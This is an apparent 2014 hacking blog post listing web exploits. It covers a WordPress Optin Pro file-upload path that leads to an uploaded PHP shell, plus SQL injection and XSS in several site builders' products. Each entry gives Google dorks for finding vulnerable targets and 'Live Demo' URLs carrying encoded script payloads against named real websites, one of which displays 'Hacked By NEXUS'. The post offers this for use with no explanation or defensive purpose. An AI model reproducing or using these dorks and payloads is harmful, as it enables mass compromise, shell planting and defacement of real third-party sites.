Saturday, July 19, 2014

Exploit WordPress: Optin Pro - File Upload Vulnerability

Once again, I'm not gonna explain anything about this exploit since it is exactly the same as in my previous post. So, I'm just gonna give you the dork and the exploit.

DORK: inurl:/wp-content/uploads/svp/headerimage/
inurl:/wp-content/plugins/wp_optin_pro/

EXPLOIT: /wp-content/plugins/wp_optin_pro/media-upload.php

SHELL UPLOADED TO: /wp-content/uploads/svp/headerimage/random_id_filename.php

Espacio Ecuador XSS & SQLI



Dork:

intext:"developed by Espacio Ecuador"


Exploits:

http://site.com/*.*?id= <SQLI>
http://site.com/*.*?id= <XSS>


Live Demo:

SQLI:

http://www.galapagostraveline.com/deal.html?opc=31%27


XSS:

http://www.galapagostraveline.com/deal.html?opc=31%22%3E%3Cscript%3Ealert%281337%29;%3C/script%3E


Pej Studio & Nissi Infotech & Plante Graffix - XSS



Dork:

intext:"Created By Nissi Infotech"


Exploits:

http://target.com/name.php?id= [XSS & SQLI]


Live Demo:

http://www.jayapriya.com/realestate/projectdetail.php?id=42%22%3E%3Cscript%3Ealert%28String.fromCharCode%2872,%2097,%2067,%20107,%20101,%20100,%2032,%2066,%20121,%2032,%2078,%2069,%2088,%2085,%2083,%2032,%2033%29%29;%3C/script%3E

MyBB Kingchat - XSS



Dork:

inurl:/kingchat.php?


Exploit:

/kingchat.php?notic


Change that /... to this to see the exploit:

/kingchat.php?chat=2&l=2


Then add your scripts...

Live Demo:

http://www.embargoedchat.co.uk/kingchat.php?chat=2&l=2%22%3E%3Cscript%3Ealert%28String.fromCharCode%2872,%2097,%2067,%20107,%20101,%20100,%2032,%2066,%20121,%2032,%2078,%2069,%2088,%2085,%2083,%2032,%2033%29%29;%3C/script%3E


Pro-Service - XSS Vulnerability



Dorks:

intext:"Pro-Service" inurl:"/resume_list.php?id="
intext:"Pro-Service"


Exploit:

/resume_list.php?id=


Live Demo:

http://www.staff.ge/resume_list.php?id=2%22%3E%3Cscript%3Ealert%28String.fromCharCode%2872,%2097,%2067,%20107,%20101,%20100,%2032,%2066,%20121,%2032,78,%2069,%2088,%2085,%2083,%2032,%2033%29%29;%3C/script%3E
